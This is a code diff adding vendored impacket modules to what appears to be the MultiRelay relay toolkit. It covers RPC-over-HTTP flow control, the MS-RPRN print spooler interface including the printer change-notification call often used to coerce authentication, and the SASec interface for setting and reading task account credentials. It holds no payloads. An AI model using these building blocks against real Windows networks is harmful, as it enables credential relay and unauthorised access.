+            # However, certain fields use common sets of values with a consistent
+            # interpretation across the two protocols.
+            #
+            # This MUST recv MSRPCHeader._SIZE bytes, and not MSRPCRespHeader._SIZE bytes!
+            #
+            while len(response_data) < MSRPCHeader._SIZE:
+                response_data += self.rpc_out_recv1(MSRPCHeader._SIZE - len(response_data))
+
+            response_header = MSRPCHeader(response_data)
+
+            # frag_len contains the full length of the packet for both
+            # MSRPC and RTS
+            frag_len = response_header['frag_len']
+
+            # Receiving the full pkt and no more
+            while len(response_data) < frag_len:
+               response_data += self.rpc_out_recv1(frag_len - len(response_data))
+
+            # We need to do the Flow Control procedures
+            #
+            # 3.2.1.1.4
+            # This protocol specifies that only RPC PDUs are subject to the flow control abstract data
+            # model. RTS PDUs and the HTTP request and response headers are not subject to flow control.
+            if response_header['type'] != MSRPC_RTS:
+                self.flow_control(frag_len)
+
+            if handle_rts is True and response_header['type'] == MSRPC_RTS:
+                self.handle_out_of_sequence_rts(response_data)
+            else:
+                return response_data
+
+    def recv(self, forceRecv=0, count=0):
+        return self.rpc_out_read_pkt(handle_rts=True)
+
+    def handle_out_of_sequence_rts(self, response_data):
+        packet = RTSHeader(response_data)
+
+        #print("=========== RTS PKT ===========")
+        #print("RAW: %s" % binascii.hexlify(response_data))
+        #packet.dump()
+        #
+        #pduData = packet['pduData']
+        #numberOfCommands = packet['NumberOfCommands']
+        #
+        #server_cmds = []
+        #while numberOfCommands > 0:
+        #    numberOfCommands -= 1
+        #
+        #    cmd_type = unpack('<L', pduData[:4])[0]
+        #    cmd = COMMANDS[cmd_type](pduData)
+        #    server_cmds.append(cmd)
+        #    pduData = pduData[len(cmd):]
+        #
+        #for cmd in server_cmds:
+        #    cmd.dump()
+        #print("=========== / RTS PKT ===========")
+
+        # 2.2.4.49 Ping RTS PDU
+        if packet['Flags'] == RTS_FLAG_PING:
+            # 3.2.1.2.1 PingTimer
+            #
+            # If the SendingChannel is part of a Virtual Connection in the Outbound Proxy or Client roles, the
+            # SendingChannel maintains a PingTimer that on expiration indicates a PING PDU must be sent to the
+            # receiving channel. The PING PDU is sent to the receiving channel when no data has been sent within
+            # half of the value of the KeepAliveInterval.
+
+            # As we do not do long-term connections with no data transfer,
+            # it means something on the server-side is going wrong.
+            self.rts_ping_received = True
+            LOG.error("Ping RTS PDU packet received. Is the RPC Server alive?")
+
+            # Just in case it's a long operation, let's send PING PDU to IN Channel like in xfreerdp
+            # It's better to send more than one PING packet as it only 20 bytes long
+            packet = hPing()
+            self.send(packet)
+            self.send(packet)
+        # 2.2.4.24 OUT_R1/A2 RTS PDU
+        elif packet['Flags'] == RTS_FLAG_RECYCLE_CHANNEL:
+            raise RPCProxyClientException("The server requested recycling of a virtual OUT channel, " \
+                "but this function is not supported!")
+        # Ignore all other messages, most probably flow control acknowledgments
+        else:
+            pass
+
+    def flow_control(self, frag_len):
+        self.__bytesReceived += frag_len
+        self.__receiverAvailableWindow -= frag_len
+
+        if (self.__receiverAvailableWindow < self.__availableWindowAdvertised // 2):
+            self.__receiverAvailableWindow = self.__availableWindowAdvertised
+            packet = hFlowControlAckWithDestination(FDOutProxy, self.__bytesReceived,
+                self.__availableWindowAdvertised, self.__outChannelCookie)
+            self.send(packet)
+
+    def connect(self):
+        self.create_rpc_in_channel()
+        self.create_rpc_out_channel()
+        self.create_tunnel()
+
+    def disconnect(self):
+        self.close_rpc_in_channel()
+        self.close_rpc_out_channel()
+        self.init_state()

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rprn.py

@@ -0,0 +1,525 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-RPRN] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket import system_errors
+from impacket.dcerpc.v5.dtypes import ULONGLONG, UINT, USHORT, LPWSTR, DWORD, ULONG, NULL
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_RPRN = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] 
+            return 'RPRN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'RPRN SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.1.1.7 STRING_HANDLE
+STRING_HANDLE = LPWSTR
+class PSTRING_HANDLE(NDRPOINTER):
+    referent = (
+        ('Data', STRING_HANDLE),
+    )
+
+# 2.2.3.1 Access Values
+JOB_ACCESS_ADMINISTER         = 0x00000010
+JOB_ACCESS_READ               = 0x00000020
+JOB_EXECUTE                   = 0x00020010
+JOB_READ                      = 0x00020020
+JOB_WRITE                     = 0x00020010
+JOB_ALL_ACCESS                = 0x000F0030
+PRINTER_ACCESS_ADMINISTER     = 0x00000004
+PRINTER_ACCESS_USE            = 0x00000008
+PRINTER_ACCESS_MANAGE_LIMITED = 0x00000040
+PRINTER_ALL_ACCESS            = 0x000F000C
+PRINTER_EXECUTE               = 0x00020008
+PRINTER_READ                  = 0x00020008
+PRINTER_WRITE                 = 0x00020008
+SERVER_ACCESS_ADMINISTER      = 0x00000001
+SERVER_ACCESS_ENUMERATE       = 0x00000002
+SERVER_ALL_ACCESS             = 0x000F0003
+SERVER_EXECUTE                = 0x00020002
+SERVER_READ                   = 0x00020002
+SERVER_WRITE                  = 0x00020003
+SPECIFIC_RIGHTS_ALL           = 0x0000FFFF
+STANDARD_RIGHTS_ALL           = 0x001F0000
+STANDARD_RIGHTS_EXECUTE       = 0x00020000
+STANDARD_RIGHTS_READ          = 0x00020000
+STANDARD_RIGHTS_REQUIRED      = 0x000F0000
+STANDARD_RIGHTS_WRITE         = 0x00020000
+SYNCHRONIZE                   = 0x00100000
+DELETE                        = 0x00010000
+READ_CONTROL                  = 0x00020000
+WRITE_DAC                     = 0x00040000
+WRITE_OWNER                   = 0x00080000
+GENERIC_READ                  = 0x80000000
+GENERIC_WRITE                 = 0x40000000
+GENERIC_EXECUTE               = 0x20000000
+GENERIC_ALL                   = 0x10000000
+
+# 2.2.3.6.1 Printer Change Flags for Use with a Printer Handle
+PRINTER_CHANGE_SET_PRINTER        = 0x00000002
+PRINTER_CHANGE_DELETE_PRINTER     = 0x00000004
+PRINTER_CHANGE_PRINTER            = 0x000000FF
+PRINTER_CHANGE_ADD_JOB            = 0x00000100
+PRINTER_CHANGE_SET_JOB            = 0x00000200
+PRINTER_CHANGE_DELETE_JOB         = 0x00000400
+PRINTER_CHANGE_WRITE_JOB          = 0x00000800
+PRINTER_CHANGE_JOB                = 0x0000FF00
+PRINTER_CHANGE_SET_PRINTER_DRIVER = 0x20000000
+PRINTER_CHANGE_TIMEOUT            = 0x80000000
+PRINTER_CHANGE_ALL                = 0x7777FFFF
+PRINTER_CHANGE_ALL_2              = 0x7F77FFFF
+
+# 2.2.3.6.2 Printer Change Flags for Use with a Server Handle
+PRINTER_CHANGE_ADD_PRINTER_DRIVER        = 0x10000000
+PRINTER_CHANGE_DELETE_PRINTER_DRIVER     = 0x40000000
+PRINTER_CHANGE_PRINTER_DRIVER            = 0x70000000
+PRINTER_CHANGE_ADD_FORM                  = 0x00010000
+PRINTER_CHANGE_DELETE_FORM               = 0x00040000
+PRINTER_CHANGE_SET_FORM                  = 0x00020000
+PRINTER_CHANGE_FORM                      = 0x00070000
+PRINTER_CHANGE_ADD_PORT                  = 0x00100000
+PRINTER_CHANGE_CONFIGURE_PORT            = 0x00200000
+PRINTER_CHANGE_DELETE_PORT               = 0x00400000
+PRINTER_CHANGE_PORT                      = 0x00700000
+PRINTER_CHANGE_ADD_PRINT_PROCESSOR       = 0x01000000
+PRINTER_CHANGE_DELETE_PRINT_PROCESSOR    = 0x04000000
+PRINTER_CHANGE_PRINT_PROCESSOR           = 0x07000000
+PRINTER_CHANGE_ADD_PRINTER               = 0x00000001
+PRINTER_CHANGE_FAILED_CONNECTION_PRINTER = 0x00000008
+PRINTER_CHANGE_SERVER                    = 0x08000000
+
+# 2.2.3.7 Printer Enumeration Flags
+PRINTER_ENUM_LOCAL       = 0x00000002
+PRINTER_ENUM_CONNECTIONS = 0x00000004
+PRINTER_ENUM_NAME        = 0x00000008
+PRINTER_ENUM_REMOTE      = 0x00000010
+PRINTER_ENUM_SHARED      = 0x00000020
+PRINTER_ENUM_NETWORK     = 0x00000040
+PRINTER_ENUM_EXPAND      = 0x00004000
+PRINTER_ENUM_CONTAINER   = 0x00008000
+PRINTER_ENUM_ICON1       = 0x00010000
+PRINTER_ENUM_ICON2       = 0x00020000
+PRINTER_ENUM_ICON3       = 0x00040000
+PRINTER_ENUM_ICON8       = 0x00800000
+PRINTER_ENUM_HIDE        = 0x01000000
+
+
+# 2.2.3.8 Printer Notification Values
+PRINTER_NOTIFY_CATEGORY_2D  = 0x00000000
+PRINTER_NOTIFY_CATEGORY_ALL = 0x00010000
+PRINTER_NOTIFY_CATEGORY_3D  = 0x00020000
+
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.1.1.4 PRINTER_HANDLE
+class PRINTER_HANDLE(NDRSTRUCT):
+    structure =  (
+        ('Data','20s=b""'),
+    )
+    def getAlignment(self):
+        if self._isNDR64 is True:
+            return 8
+        else:
+            return 4
+
+# 2.2.1.2.1 DEVMODE_CONTAINER
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', BYTE_ARRAY),
+    )
+
+class DEVMODE_CONTAINER(NDRSTRUCT):
+    structure =  (
+        ('cbBuf',DWORD),
+        ('pDevMode',PBYTE_ARRAY),
+    )
+
+# 2.2.1.11.1 SPLCLIENT_INFO_1
+class SPLCLIENT_INFO_1(NDRSTRUCT):
+    structure =  (
+        ('dwSize',DWORD),
+        ('pMachineName',LPWSTR),
+        ('pUserName',LPWSTR),
+        ('dwBuildNum',DWORD),
+        ('dwMajorVersion',DWORD),
+        ('dwMinorVersion',DWORD),
+        ('wProcessorArchitecture',USHORT),
+    )
+
+class PSPLCLIENT_INFO_1(NDRPOINTER):
+    referent = (
+        ('Data', SPLCLIENT_INFO_1),
+    )
+
+# 2.2.1.11.2 SPLCLIENT_INFO_2
+class SPLCLIENT_INFO_2(NDRSTRUCT):
+    structure =  (
+        ('notUsed',ULONGLONG),
+    )
+
+class PSPLCLIENT_INFO_2(NDRPOINTER):
+    referent = (
+        ('Data', SPLCLIENT_INFO_2),
+    )
+# 2.2.1.11.3 SPLCLIENT_INFO_3
+class SPLCLIENT_INFO_3(NDRSTRUCT):
+    structure =  (
+        ('cbSize',UINT),
+        ('dwFlags',DWORD),
+        ('dwFlags',DWORD),
+        ('pMachineName',LPWSTR),
+        ('pUserName',LPWSTR),
+        ('dwBuildNum',DWORD),
+        ('dwMajorVersion',DWORD),
+        ('dwMinorVersion',DWORD),
+        ('wProcessorArchitecture',USHORT),
+        ('hSplPrinter',ULONGLONG),
+    )
+
+class PSPLCLIENT_INFO_3(NDRPOINTER):
+    referent = (
+        ('Data', SPLCLIENT_INFO_3),
+    )
+# 2.2.1.2.14 SPLCLIENT_CONTAINER
+class CLIENT_INFO_UNION(NDRUNION):
+    commonHdr = (
+        ('tag', ULONG),
+    )
+    union = {
+        1 : ('pClientInfo1', PSPLCLIENT_INFO_1),
+        2 : ('pNotUsed1', PSPLCLIENT_INFO_2),
+        3 : ('pNotUsed2', PSPLCLIENT_INFO_3),
+    }
+
+class SPLCLIENT_CONTAINER(NDRSTRUCT):
+    structure =  (
+        ('Level',DWORD),
+        ('ClientInfo',CLIENT_INFO_UNION),
+    )
+
+
+# 2.2.1.13.2 RPC_V2_NOTIFY_OPTIONS_TYPE
+class USHORT_ARRAY(NDRUniConformantArray):
+    item = '<H'
+
+class PUSHORT_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', USHORT_ARRAY),
+    )
+
+class RPC_V2_NOTIFY_OPTIONS_TYPE(NDRSTRUCT):
+    structure =  (
+        ('Type',USHORT),
+        ('Reserved0',USHORT),
+        ('Reserved1',DWORD),
+        ('Reserved2',DWORD),
+        ('Count',DWORD),
+        ('pFields',PUSHORT_ARRAY),
+    )
+
+class PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', RPC_V2_NOTIFY_OPTIONS_TYPE),
+    )
+
+# 2.2.1.13.1 RPC_V2_NOTIFY_OPTIONS
+class RPC_V2_NOTIFY_OPTIONS(NDRSTRUCT):
+    structure =  (
+        ('Version',DWORD),
+        ('Reserved',DWORD),
+        ('Count',DWORD),
+        ('pTypes',PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY),
+    )
+
+class PRPC_V2_NOTIFY_OPTIONS(NDRPOINTER):
+    referent = (
+        ('Data', RPC_V2_NOTIFY_OPTIONS),
+    )
+
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.2.1 RpcEnumPrinters (Opnum 0)
+class RpcEnumPrinters(NDRCALL):
+    opnum = 0
+    structure = (
+       ('Flags', DWORD),
+       ('Name', STRING_HANDLE),
+       ('Level', DWORD),
+       ('pPrinterEnum', PBYTE_ARRAY),
+       ('cbBuf', DWORD),
+    )
+
+class RpcEnumPrintersResponse(NDRCALL):
+    structure = (
+       ('pPrinterEnum', PBYTE_ARRAY),
+       ('pcbNeeded', DWORD),
+       ('pcReturned', DWORD),
+       ('ErrorCode', ULONG),
+    )
+# 3.1.4.2.2 RpcOpenPrinter (Opnum 1)
+class RpcOpenPrinter(NDRCALL):
+    opnum = 1
+    structure = (
+       ('pPrinterName', STRING_HANDLE),
+       ('pDatatype', LPWSTR),
+       ('pDevModeContainer', DEVMODE_CONTAINER),
+       ('AccessRequired', DWORD),
+    )
+
+class RpcOpenPrinterResponse(NDRCALL):
+    structure = (
+       ('pHandle', PRINTER_HANDLE),
+       ('ErrorCode', ULONG),
+    )
+
+# 3.1.4.2.9 RpcClosePrinter (Opnum 29)
+class RpcClosePrinter(NDRCALL):
+    opnum = 29
+    structure = (
+       ('phPrinter', PRINTER_HANDLE),
+    )
+
+class RpcClosePrinterResponse(NDRCALL):
+    structure = (
+       ('phPrinter', PRINTER_HANDLE),
+       ('ErrorCode', ULONG),
+    )
+
+# 3.1.4.10.4 RpcRemoteFindFirstPrinterChangeNotificationEx (Opnum 65)
+class RpcRemoteFindFirstPrinterChangeNotificationEx(NDRCALL):
+    opnum = 65
+    structure = (
+       ('hPrinter', PRINTER_HANDLE),
+       ('fdwFlags', DWORD),
+       ('fdwOptions', DWORD),
+       ('pszLocalMachine', LPWSTR),
+       ('dwPrinterLocal', DWORD),
+       ('pOptions', PRPC_V2_NOTIFY_OPTIONS),
+    )
+
+class RpcRemoteFindFirstPrinterChangeNotificationExResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# 3.1.4.2.14 RpcOpenPrinterEx (Opnum 69)
+class RpcOpenPrinterEx(NDRCALL):
+    opnum = 69
+    structure = (
+       ('pPrinterName', STRING_HANDLE),
+       ('pDatatype', LPWSTR),
+       ('pDevModeContainer', DEVMODE_CONTAINER),
+       ('AccessRequired', DWORD),
+       ('pClientInfo', SPLCLIENT_CONTAINER),
+    )
+
+class RpcOpenPrinterExResponse(NDRCALL):
+    structure = (
+       ('pHandle', PRINTER_HANDLE),
+       ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+    0  : (RpcEnumPrinters, RpcEnumPrintersResponse),
+    1  : (RpcOpenPrinter, RpcOpenPrinterResponse),
+    29 : (RpcClosePrinter, RpcClosePrinterResponse),
+    65 : (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
+    69 : (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hRpcOpenPrinter(dce, printerName, pDatatype = NULL, pDevModeContainer = NULL, accessRequired = SERVER_READ):
+    """
+    RpcOpenPrinter retrieves a handle for a printer, port, port monitor, print job, or print server.
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244808.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param string printerName: A string for a printer connection, printer object, server object, job object, port
+    object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
+    (IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
+    call (RPC) binds to, and it MUST uniquely identify a print server on the network.
+    :param string pDatatype: A string that specifies the data type to be associated with the printer handle.
+    :param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
+    DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
+    :param int accessRequired: The access level that the client requires for interacting with the object to which a
+    handle is being opened.
+
+    :return: a RpcOpenPrinterResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcOpenPrinter()
+    request['pPrinterName'] = checkNullString(printerName)
+    request['pDatatype'] = pDatatype
+    if pDevModeContainer is NULL:
+        request['pDevModeContainer']['pDevMode'] = NULL
+    else:
+        request['pDevModeContainer'] = pDevModeContainer
+
+    request['AccessRequired'] = accessRequired
+    return dce.request(request)
+
+def hRpcClosePrinter(dce, phPrinter):
+    """
+    RpcClosePrinter closes a handle to a printer object, server object, job object, or port object.
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244768.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param PRINTER_HANDLE phPrinter: A handle to a printer object, server object, job object, or port object.
+
+    :return: a RpcClosePrinterResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcClosePrinter()
+    request['phPrinter'] = phPrinter
+    return dce.request(request)
+
+
+def hRpcOpenPrinterEx(dce, printerName, pDatatype=NULL, pDevModeContainer=NULL, accessRequired=SERVER_READ,
+                      pClientInfo=NULL):
+    """
+    RpcOpenPrinterEx retrieves a handle for a printer, port, port monitor, print job, or print server
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244809.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param string printerName: A string for a printer connection, printer object, server object, job object, port
+    object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
+    (IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
+    call (RPC) binds to, and it MUST uniquely identify a print server on the network.
+    :param string pDatatype: A string that specifies the data type to be associated with the printer handle.
+    :param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
+    DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
+    :param int accessRequired: The access level that the client requires for interacting with the object to which a
+    handle is being opened.
+    :param SPLCLIENT_CONTAINER pClientInfo: This parameter MUST adhere to the specification in SPLCLIENT_CONTAINER Parameters.
+
+    :return: a RpcOpenPrinterExResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcOpenPrinterEx()
+    request['pPrinterName'] = checkNullString(printerName)
+    request['pDatatype'] = pDatatype
+    if pDevModeContainer is NULL:
+        request['pDevModeContainer']['pDevMode'] = NULL
+    else:
+        request['pDevModeContainer'] = pDevModeContainer
+
+    request['AccessRequired'] = accessRequired
+    if pClientInfo is NULL:
+        raise Exception('pClientInfo cannot be NULL')
+
+    request['pClientInfo'] = pClientInfo
+    return dce.request(request)
+
+
+def hRpcRemoteFindFirstPrinterChangeNotificationEx(dce, hPrinter, fdwFlags, fdwOptions=0, pszLocalMachine=NULL,
+                                                   dwPrinterLocal=0, pOptions=NULL):
+    """
+    creates a remote change notification object that monitors changes to printer objects and sends change notifications
+    to a print client using either RpcRouterReplyPrinter (section 3.2.4.1.2) or RpcRouterReplyPrinterEx (section 3.2.4.1.4)
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244813.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param PRINTER_HANDLE hPrinter: A handle to a printer or server object.
+    :param int fdwFlags: Flags that specify the conditions that are required for a change notification object to enter a signaled state.
+    :param int fdwOptions: The category of printers for which change notifications are returned.
+    :param string pszLocalMachine: A string that represents the name of the client computer.
+    :param int dwPrinterLocal: An implementation-specific unique value that MUST be sufficient for the client to determine
+    whether a call to RpcReplyOpenPrinter by the server is associated with the hPrinter parameter in this call.
+    :param RPC_V2_NOTIFY_OPTIONS pOptions:  An RPC_V2_NOTIFY_OPTIONS structure that specifies printer or job members that the client listens to for notifications.
+
+    :return: a RpcRemoteFindFirstPrinterChangeNotificationExResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcRemoteFindFirstPrinterChangeNotificationEx()
+
+    request['hPrinter'] = hPrinter
+    request['fdwFlags'] = fdwFlags
+    request['fdwOptions'] = fdwOptions
+    request['dwPrinterLocal'] = dwPrinterLocal
+    if pszLocalMachine is NULL:
+        raise Exception('pszLocalMachine cannot be NULL')
+    request['pszLocalMachine'] = checkNullString(pszLocalMachine)
+    request['pOptions'] = pOptions
+    return dce.request(request)
+
+def hRpcEnumPrinters(dce, flags, name = NULL, level = 1):
+    """
+    RpcEnumPrinters enumerates available printers, print servers, domains, or print providers.
+    Full Documentation: https://msdn.microsoft.com/en-us/library/cc244794.aspx
+
+    :param DCERPC_v5 dce: a connected DCE instance.
+    :param int flags: The types of print objects that this method enumerates. The value of this parameter is the
+    result of a bitwise OR of one or more of the Printer Enumeration Flags (section 2.2.3.7).
+    :param string name: NULL or a server name parameter as specified in Printer Server Name Parameters (section 3.1.4.1.4).
+    :param level: The level of printer information structure.
+
+    :return: a RpcEnumPrintersResponse instance, raises DCERPCSessionError on error.
+    """
+    request = RpcEnumPrinters()
+    request['Flags'] = flags
+    request['Name'] = name
+    request['pPrinterEnum'] = NULL
+    request['Level'] = level
+    bytesNeeded = 0
+    try:
+        dce.request(request)
+    except DCERPCSessionError as e:
+        if str(e).find('ERROR_INSUFFICIENT_BUFFER') < 0:
+            raise
+        bytesNeeded = e.get_packet()['pcbNeeded']
+
+    request = RpcEnumPrinters()
+    request['Flags'] = flags
+    request['Name'] = name
+    request['Level'] = level
+
+    request['cbBuf'] = bytesNeeded
+    request['pPrinterEnum'] = b'a' * bytesNeeded
+    return dce.request(request)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/sasec.py

@@ -0,0 +1,175 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-TSCH] SASec Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, WSTR, NULL
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_SASEC  = uuidtup_to_bin(('378E52B0-C0A9-11CF-822D-00AA0051E40F','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+SASEC_HANDLE = WSTR
+PSASEC_HANDLE = LPWSTR
+
+MAX_BUFFER_SIZE = 273
+
+# 3.2.5.3.4 SASetAccountInformation (Opnum 0)
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON = 0x40000
+
+################################################################################
+# STRUCTURES
+################################################################################
+class WORD_ARRAY(NDRUniConformantArray):
+    item = '<H'
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.2.5.3.4 SASetAccountInformation (Opnum 0)
+class SASetAccountInformation(NDRCALL):
+    opnum = 0
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('pwszJobName', WSTR),
+        ('pwszAccount', WSTR),
+        ('pwszPassword', LPWSTR),
+        ('dwJobFlags', DWORD),
+    )
+
+class SASetAccountInformationResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.3.5 SASetNSAccountInformation (Opnum 1)
+class SASetNSAccountInformation(NDRCALL):
+    opnum = 1
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('pwszAccount', LPWSTR),
+        ('pwszPassword', LPWSTR),
+    )
+
+class SASetNSAccountInformationResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.3.6 SAGetNSAccountInformation (Opnum 2)
+class SAGetNSAccountInformation(NDRCALL):
+    opnum = 2
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('ccBufferSize', DWORD),
+        ('wszBuffer', WORD_ARRAY),
+    )
+
+class SAGetNSAccountInformationResponse(NDRCALL):
+    structure = (
+        ('wszBuffer',WORD_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.3.7 SAGetAccountInformation (Opnum 3)
+class SAGetAccountInformation(NDRCALL):
+    opnum = 3
+    structure = (
+        ('Handle', PSASEC_HANDLE),
+        ('pwszJobName', WSTR),
+        ('ccBufferSize', DWORD),
+        ('wszBuffer', WORD_ARRAY),
+    )
+
+class SAGetAccountInformationResponse(NDRCALL):
+    structure = (
+        ('wszBuffer',WORD_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (SASetAccountInformation, SASetAccountInformationResponse),
+ 1 : (SASetNSAccountInformation, SASetNSAccountInformationResponse),
+ 2 : (SAGetNSAccountInformation, SAGetNSAccountInformationResponse),
+ 3 : (SAGetAccountInformation, SAGetAccountInformationResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hSASetAccountInformation(dce, handle, pwszJobName, pwszAccount, pwszPassword, dwJobFlags=0):
+    request = SASetAccountInformation()
+    request['Handle'] = handle
+    request['pwszJobName'] = checkNullString(pwszJobName)
+    request['pwszAccount'] = checkNullString(pwszAccount)
+    request['pwszPassword'] = checkNullString(pwszPassword)
+    request['dwJobFlags'] = dwJobFlags
+    return dce.request(request)
+
+def hSASetNSAccountInformation(dce, handle, pwszAccount, pwszPassword):
+    request = SASetNSAccountInformation()
+    request['Handle'] = handle
+    request['pwszAccount'] = checkNullString(pwszAccount)
+    request['pwszPassword'] = checkNullString(pwszPassword)
+    return dce.request(request)
+
+def hSAGetNSAccountInformation(dce, handle, ccBufferSize = MAX_BUFFER_SIZE):
+    request = SAGetNSAccountInformation()
+    request['Handle'] = handle
+    request['ccBufferSize'] = ccBufferSize
+    for _ in range(ccBufferSize):
+        request['wszBuffer'].append(0)
+    return dce.request(request)
+
+def hSAGetAccountInformation(dce, handle, pwszJobName, ccBufferSize = MAX_BUFFER_SIZE):
+    request = SAGetAccountInformation()
+    request['Handle'] = handle
+    request['pwszJobName'] = checkNullString(pwszJobName)
+    request['ccBufferSize'] = ccBufferSize
+    for _ in range(ccBufferSize):
+        request['wszBuffer'].append(0)
+    return dce.request(request)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/transport.py

@@ -0,0 +1,592 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   Transport implementations for the DCE/RPC protocol.
+#
+from __future__ import division
+from __future__ import print_function
+
+import binascii
+import os
+import re
+import socket
+
+try:
+    from urllib.parse import urlparse, urlunparse
+except ImportError:
+    from urlparse import urlparse, urlunparse
+
+from impacket import ntlm
